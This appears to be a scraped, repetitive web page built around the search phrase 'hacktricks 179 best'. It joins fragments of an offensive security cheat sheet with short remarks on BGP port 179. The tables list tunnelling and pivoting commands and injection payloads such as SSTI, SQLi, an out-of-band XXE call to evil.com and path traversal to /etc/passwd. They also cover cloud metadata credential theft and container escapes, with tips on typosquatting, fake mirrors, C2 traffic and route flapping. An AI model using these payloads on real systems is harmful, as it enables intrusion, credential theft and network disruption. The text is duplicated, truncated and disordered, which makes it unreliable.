| We use cookies to enhance your browsing experience, serve personalized ads or content, and analyze our traffic. By continuing use of our website, you consent to our use of cookies. (Cookie Policy) | READ MORE CLOSE |
| # | Trick | Command | |---|-------|---------| | 126 | SSH dynamic port forward | ssh -D 1080 user@target | | 127 | Chisel SOCKS5 | chisel client server:8000 socks | | 128 | Ligolo-ng tunnel | ligolo-proxy -selfcert | | 129 | Plink (Windows SSH) | plink.exe -ssh -R 1080 | | 130 | ICMP tunneling | ptunnel -p target -lp 8000 | | 131 | DNS tunneling (dnscat2) | dnscat2-server domain.com | | ... | ... | ... | | 140 | Proxychains + nmap | proxychains nmap -sT -Pn 10.0.0.1 |
Typosquatting domains and malicious mirrors - Purchase similar domains and host fake mirrors.
| # | Trick | Example / Payload | |---|-------|--------------------| | 61 | SSTI (Jinja2) | config.__class__.__init__.__globals__['os'].popen('id').read() | | 62 | SQLi UNION extract DB | ' UNION SELECT @@version,user(),database() -- - | | 63 | NoSQLi (MongoDB) | '$ne': '' or ';return true;var foo=' | | 64 | GraphQL introspection | __schematypesname,fieldsname | | 65 | JWT none algorithm | Change alg to none , remove signature | | 66 | XXE (out-of-band) | <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://evil.com/xxe"> %xxe;]> | | 67 | SSRF to internal metadata | http://169.254.169.254/latest/meta-data/ | | 68 | LFI to RCE (PHP) | php://filter/convert.base64-encode/resource=index.php | | 69 | Path traversal | ....//....//....//etc/passwd | | 70 | Open redirect | ?redirect=https://evil.com | | ... | ... | ... | | 90 | CSP bypass (unsafe-inline) | ?name=<script>alert(1)</script> |
When port 179 is left exposed without strict cryptographic boundaries, it introduces systemic risk to network stability. MEDIUM: Accessible BGP Service Report hacktricks 179 best
Encrypting C2 traffic and certificate pinning bypass - Use valid certs and ensure SNI matches expected hosts.
Port scanning (fast then full)
Sending malformed packets or forcing session resets (route flapping) to disrupt internet connectivity. | # | Trick | Command | |---|-------|---------|
Port 179 is the invisible infrastructure of the internet. Testing its security ("hacktricks 179 best") requires a deep understanding of network routing and BGP. By treating Port 179 as a high-risk entry point, security professionals can prevent massive traffic hijacks and maintain network integrity.
| # | Trick | Technique | |---|-------|------------| | 111 | Kubernetes hostPath escape | volumeMounts → hostPath: / → write SSH key | | 112 | Docker socket (DIND) | curl -XPOST --unix-socket /var/run/docker.sock ... | | 113 | AWS metadata credentials | curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ | | 114 | GCP metadata SSH keys | curl -H "Metadata-Flavor: Google" http://metadata.google.internal/... | | 115 | Azure Managed Identity | curl -H Metadata:true "http://169.254.169.254/metadata/identity/..." | | 116 | ECR pull from compromised pod | aws ecr get-login-password → docker pull | | 117 | Kubernetes RBAC abuse | kubectl auth can-i create pods --all-namespaces | | ... | ... | ... | | 125 | Exposed kubeconfig | find / -name *.kubeconfig 2>/dev/null |
Docker misconfigurations (exposed socket) - If /var/run/docker.sock exposed, you can spawn containers as root. | | 140 | Proxychains + nmap | proxychains nmap -sT -Pn 10
Easy navigation through specialized sections (Web, Network, Cloud, Windows/Linux).
Business logic flaws
| # | Trick | Command | |---|-------|---------| | 126 | SSH dynamic port forward | ssh -D 1080 user@target | | 127 | Chisel SOCKS5 | chisel client server:8000 socks | | 128 | Ligolo-ng tunnel | ligolo-proxy -selfcert | | 129 | Plink (Windows SSH) | plink.exe -ssh -R 1080 | | 130 | ICMP tunneling | ptunnel -p target -lp 8000 | | 131 | DNS tunneling (dnscat2) | dnscat2-server domain.com | | ... | ... | ... | | 140 | Proxychains + nmap | proxychains nmap -sT -Pn 10.0.0.1 |
Typosquatting domains and malicious mirrors - Purchase similar domains and host fake mirrors.
| # | Trick | Example / Payload | |---|-------|--------------------| | 61 | SSTI (Jinja2) | config.__class__.__init__.__globals__['os'].popen('id').read() | | 62 | SQLi UNION extract DB | ' UNION SELECT @@version,user(),database() -- - | | 63 | NoSQLi (MongoDB) | '$ne': '' or ';return true;var foo=' | | 64 | GraphQL introspection | __schematypesname,fieldsname | | 65 | JWT none algorithm | Change alg to none , remove signature | | 66 | XXE (out-of-band) | <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://evil.com/xxe"> %xxe;]> | | 67 | SSRF to internal metadata | http://169.254.169.254/latest/meta-data/ | | 68 | LFI to RCE (PHP) | php://filter/convert.base64-encode/resource=index.php | | 69 | Path traversal | ....//....//....//etc/passwd | | 70 | Open redirect | ?redirect=https://evil.com | | ... | ... | ... | | 90 | CSP bypass (unsafe-inline) | ?name=<script>alert(1)</script> |
When port 179 is left exposed without strict cryptographic boundaries, it introduces systemic risk to network stability. MEDIUM: Accessible BGP Service Report
Encrypting C2 traffic and certificate pinning bypass - Use valid certs and ensure SNI matches expected hosts.
Port scanning (fast then full)
Sending malformed packets or forcing session resets (route flapping) to disrupt internet connectivity.
Port 179 is the invisible infrastructure of the internet. Testing its security ("hacktricks 179 best") requires a deep understanding of network routing and BGP. By treating Port 179 as a high-risk entry point, security professionals can prevent massive traffic hijacks and maintain network integrity.
| # | Trick | Technique | |---|-------|------------| | 111 | Kubernetes hostPath escape | volumeMounts → hostPath: / → write SSH key | | 112 | Docker socket (DIND) | curl -XPOST --unix-socket /var/run/docker.sock ... | | 113 | AWS metadata credentials | curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ | | 114 | GCP metadata SSH keys | curl -H "Metadata-Flavor: Google" http://metadata.google.internal/... | | 115 | Azure Managed Identity | curl -H Metadata:true "http://169.254.169.254/metadata/identity/..." | | 116 | ECR pull from compromised pod | aws ecr get-login-password → docker pull | | 117 | Kubernetes RBAC abuse | kubectl auth can-i create pods --all-namespaces | | ... | ... | ... | | 125 | Exposed kubeconfig | find / -name *.kubeconfig 2>/dev/null |
Docker misconfigurations (exposed socket) - If /var/run/docker.sock exposed, you can spawn containers as root.
Easy navigation through specialized sections (Web, Network, Cloud, Windows/Linux).
Business logic flaws